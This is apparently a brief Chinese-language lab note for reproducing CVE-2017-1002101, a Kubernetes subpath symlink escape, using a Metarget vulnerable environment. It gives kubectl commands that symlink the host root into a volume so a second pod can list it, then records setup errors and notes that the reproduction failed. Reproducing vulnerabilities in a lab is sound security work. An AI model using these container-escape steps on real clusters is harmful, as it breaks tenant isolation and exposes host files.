# CVE-2017-1002101
See: https://github.com/Metarget/cloud-native-security-book/blob/main/appendix/CVE-2017-1002101%EF%BC%9A%E7%AA%81%E7%A0%B4%E9%9A%94%E7%A6%BB%E8%AE%BF%E9%97%AE%E5%AE%BF%E4%B8%BB%E6%9C%BA%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F.pdf
## Description
CVE-2017-1002101是一个Kubernetes的文件系统逃逸漏洞，允许攻击者使用子路径卷挂载来访问卷空间外的
文件或目录.Kubernetesv1.3.x、v1.4.x、及低于vl.7.14、vl.8.9和v1.9.4版本的Kubernetes均受到影响。

## Usage

环境准备

```shell
./metarget cnv install cve-2017-1002101
```

创建pod
```shell
kubectl apply -f stage-1-pod.yaml
kubectl exec -it stage-1-container -- ln -s / /vuln/xxx
```

创建第二个pod

```shell
kubectl apply -f  stage-2-pod.yaml
```

到第二个pod中
```shell
kubectl exec -it stage-2-container -- ls /vuln
```

列出的是宿主机的根目录

报
```
[kubelet-check] It seems like the kubelet isn't running or healthy.
[kubelet-check] The HTTP call equal to 'curl -sSL http://localhost:10255/healthz' failed with error: Get http://localhost:10255/healthz: dial tcp 127.0.0.1:10255: getsockopt: connection refused.
```
复现失败
```
Error response from daemon: Get https://gcr.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
```
或许上hostvds可以解决？